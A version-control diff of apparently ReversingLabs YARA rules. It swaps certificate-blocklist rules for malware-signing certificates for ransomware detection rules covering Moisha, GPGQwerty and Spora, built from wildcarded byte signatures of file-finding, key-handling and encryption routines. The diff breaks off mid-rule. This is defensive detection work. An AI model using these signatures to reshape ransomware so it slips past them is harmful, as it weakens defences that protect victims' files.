TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing SeedLocker ransomware." + description = "Yara rule that detects Moisha ransomware." author = "ReversingLabs" - id = "ecaa250b-d4ac-5cc9-9e5e-5d6f45db18ad" - date = "2023-11-08" - modified = "2023-11-08" + id = "c72f654f-955e-5ff6-ac91-19fbb858265c" + date = "2022-10-11" + modified = "2022-10-11" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2988-L3006" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "da908de031c78aa012809988e44dea564d32b88b65a2010925c1af85d578a68a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Moisha.yara#L1-L86" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "89cefbbb8ec722216721bb43eb14cc33fcd4671585051359a06b62236cbf3a6c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Moisha" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 73 ?? ?? ?? ?? 0A 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 28 + ?? ?? ?? ?? 2D ?? 06 08 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? + ?? ?? ?? DC DE ?? 26 DE ?? 06 2A + } + $find_files_p2 = { + 02 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? + 0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 03 09 6F ?? ?? ?? ?? 04 2C ?? 04 09 + 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 6F ?? ?? + ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 03 04 + 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? + ?? ?? ?? DC 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 03 11 ?? 6F ?? ?? ?? ?? 04 2C ?? 04 + 11 ?? 6F ?? ?? ?? ?? 2A + } + $find_files_p3 = { + 73 ?? ?? ?? ?? 0A 06 03 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 02 28 + ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ?? + ?? ?? ?? 2C ?? 06 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 31 ?? 06 7B ?? ?? ?? ?? 2C ?? 06 FE + 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 17 6F ?? ?? ?? ?? 07 17 6F ?? ?? ?? + ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 09 6F ?? ?? ?? ?? 06 7B + ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28 + ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 2A + } + $import_priv_key = { + 02 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 16 13 ?? 16 13 ?? 16 13 ?? 11 ?? 6F + ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 11 ?? 20 ?? + ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F + ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2E ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F + ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 28 ?? ?? ?? ?? 13 + ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? + 0B 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0C 11 ?? 28 ?? ?? ?? ?? 13 ?? + 11 ?? 11 ?? 6F ?? ?? ?? ?? 0D 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 + ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 + ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? + ?? 13 ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 06 7D ?? ?? ?? ?? 12 ?? 07 7D ?? ?? ?? ?? 12 ?? + 08 7D ?? ?? ?? ?? 12 ?? 09 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? + ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 13 ?? DE ?? 11 ?? + 6F ?? ?? ?? ?? DC 11 ?? 2A + } + $encrypt_files = { + 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 14 0B 14 0C 16 0D 20 ?? ?? ?? ?? 13 ?? 03 19 17 1D 28 + ?? ?? ?? ?? 0B 03 19 18 1D 28 ?? ?? ?? ?? 0C 02 7B ?? ?? ?? ?? 08 17 6F ?? ?? ?? ?? 13 + ?? 07 06 16 06 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 31 ?? 11 ?? 06 16 11 ?? 6F ?? ?? ?? + ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 04 11 ?? 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ?? + 13 ?? 11 ?? 8E 69 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 08 08 6F ?? ?? ?? ?? 16 6F ?? ?? ?? + ?? 26 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08 + 6F ?? ?? ?? ?? 17 0D DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 13 ?? DE ?? 07 2C + ?? 07 6F ?? ?? ?? ?? 08 2C ?? 08 6F ?? ?? ?? ?? 09 26 DC 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Project NSRM Ltd" and (pe.signatures[i].serial=="00:83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" or pe.signatures[i].serial=="83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7") and 1549830060<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($import_priv_key) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_09Aecea45Bfd40Ce7D62D7D711916D7D : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Gpgqwerty : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects GPGQwerty ransomware." author = "ReversingLabs" - id = "421425b1-13ad-5d80-b044-8bd43c60b3ff" - date = "2023-11-08" - modified = "2023-11-08" + id = "8848e00a-a695-575b-a29d-fc9521859e12" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3008-L3024" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d1c6bfb10a244ba866c8aabdff6055388afa8096fd4bd77bb21f781794333e9b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.GPGQwerty.yara#L1-L83" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e59adadd66b4d242ac7337ce4b3c3ec6c60724f4cf5b86305f1e31b88745928c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "GPGQwerty" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC + ?? 83 F8 ?? 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ?? 31 C0 EB ?? 0F B7 43 ?? 83 C0 ?? + 66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44 04 ?? 84 C0 88 01 75 ?? 8B 44 24 + ?? 24 ?? 83 F8 ?? 76 ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 66 90 + 89 43 ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 E8 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ?? 83 F8 + ?? 89 03 74 ?? E8 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ?? + E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ?? + ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? 90 56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04 + 24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ?? + 31 C0 EB ?? 0F B7 43 ?? 83 C0 ?? 66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44 + 04 ?? 84 C0 88 01 75 ?? 8B 44 24 ?? 24 ?? 83 F8 ?? 77 ?? 89 43 ?? 81 C4 ?? ?? ?? ?? + 89 F0 5B 5E C3 8D B4 26 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B + 5E C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 81 C4 ?? ?? ?? + ?? 89 F0 5B 5E C3 + } + $find_files_p2 = { + 8B 45 ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 95 C0 84 + C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? + ?? 85 C0 74 ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 + C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? + ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84 + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 + C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 + ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? + ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E8 + } + $encrypt_files = { + C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 + C0 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 + 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? + ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 C2 B8 + ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8D 85 ?? ?? ?? ?? 01 D0 66 C7 00 ?? ?? + 8B 45 ?? 83 E8 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALINA LTD" and pe.signatures[i].serial=="09:ae:ce:a4:5b:fd:40:ce:7d:62:d7:d7:11:91:6d:7d" and 1551052800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4Ff4Eda5Fa641E70162713426401F438 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Spora : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Spora ransomware." author = "ReversingLabs" - id = "3e34aa1b-a4b1-593d-bd93-0f5913ab96b9" - date = "2023-11-08" - modified = "2023-11-08" + id = "f07ee1d4-d99b-5cbf-a1f0-a3802d9e3b47" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3026-L3042" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "58f5e163d9807520497ba55e42c048020f6b7653ed71f3954e7ffb490f4de0e4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Spora.yara#L1-L124" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4e18bb42277ce9194bf75fa45d95ea7e2bd51c5d7791d3d6e013fc07626e65b0" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Spora" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DUHANEY LIMITED" and pe.signatures[i].serial=="4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" and 1555349604<=pe.signatures[i].not_after) -} -import "pe" + strings: + $encrypt_files = { + 55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 57 FF 75 ?? 33 FF 89 7D ?? FF 15 ?? ?? ?? ?? 83 F8 + ?? 0F 84 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 53 56 57 BE + ?? ?? ?? ?? 56 6A ?? 57 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB + ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F + 82 ?? ?? ?? ?? 6A ?? 57 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? + ?? 57 8D 45 ?? 50 56 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 39 75 + ?? 0F 85 ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F + 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 3B + 45 ?? 0F 84 ?? ?? ?? ?? 39 7D ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? B9 ?? ?? + ?? ?? 3B C1 72 ?? 89 4D ?? EB ?? 83 E0 ?? 89 45 ?? 57 FF 75 ?? 57 6A ?? 57 53 FF 15 + ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? FF 75 ?? 57 57 6A ?? 50 FF 15 ?? ?? ?? + ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57 FF + 75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57 + FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 57 57 + 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? + 57 57 53 89 45 ?? FF 15 ?? ?? ?? ?? 57 8D 45 ?? 50 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 + 53 FF D6 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF D6 C7 45 ?? ?? ?? ?? ?? FF 75 ?? FF + 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? + ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 5E 5B 8B 45 ?? 5F 83 C5 ?? C9 C2 + } + $create_key_file = { + 55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? 33 F6 89 75 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F + 84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D + ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 45 + ?? 50 56 6A ?? 56 FF 35 ?? ?? ?? ?? FF D7 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0 + ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 56 56 56 FF 75 ?? FF D7 85 C0 0F 84 ?? ?? ?? ?? + 53 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B F8 3B FE 0F 84 ?? ?? ?? ?? 56 6A + ?? 57 56 FF 15 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50 + FF 15 ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? + 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 68 + ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7D ?? + ?? ?? ?? ?? 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? 57 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B D8 3B DE 74 ?? 89 75 ?? 8B 45 + ?? 56 FF 74 85 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF + 15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 57 FF 15 ?? ?? ?? ?? FF + 45 ?? 83 7D ?? ?? 72 ?? 53 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 57 FF + 15 ?? ?? ?? ?? 5B FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B 45 ?? 5E 83 C5 ?? C9 C2 + } + $create_key = { + 55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 57 8D 45 ?? 50 8D 45 ?? 50 + 33 DB 53 6A ?? 53 FF 75 ?? BE ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 53 6A ?? 53 FF 35 ?? ?? ?? ?? + FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0 ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? + 53 53 53 FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 8B 35 ?? ?? ?? ?? + 03 C8 51 6A ?? FF D6 8B F8 89 7D ?? 3B FB 0F 84 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 57 FF + 15 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 8B 45 ?? 03 C7 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83 + C4 ?? 8D 45 ?? 50 8B 45 ?? 53 6A ?? 03 C8 51 57 8B 3D ?? ?? ?? ?? FF D7 85 C0 74 ?? + FF 75 ?? 6A ?? FF D6 8B F0 3B F3 74 ?? 8B 4D ?? 8D 45 ?? 50 8B 45 ?? 56 6A ?? 03 C8 + 51 FF 75 ?? FF D7 33 FF 38 1E 74 ?? 8B C6 80 38 ?? 75 ?? 40 40 8A 08 88 0C 37 47 40 + 38 18 75 ?? 88 1C 37 EB ?? 8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 75 ?? FF 75 + ?? FF 15 ?? ?? ?? ?? 5F 5B EB ?? 8B 75 ?? 8B C6 5E 83 C5 ?? C9 C2 + } + $create_lst_file = { + 55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 53 56 68 ?? ?? ?? ?? 33 F6 6A ?? 89 75 ?? FF 15 ?? + ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 45 ?? 8B 38 8D 45 + ?? 50 53 83 C7 ?? FF 15 ?? ?? ?? ?? 03 C0 50 53 FF 75 ?? FF 17 8B 45 ?? 8B 08 8D 55 + ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 53 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 8B 08 + 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? + 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? + 8B 3D ?? ?? ?? ?? 56 56 56 56 6A ?? 50 56 68 ?? ?? ?? ?? FF D7 89 45 ?? 3B C6 0F 84 + ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 56 + 56 FF 75 ?? 50 6A ?? FF 75 ?? 56 68 ?? ?? ?? ?? FF D7 8D 45 ?? 50 6A ?? 68 ?? ?? ?? + ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 E0 ?? 83 + C0 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D ?? + FF 15 ?? ?? 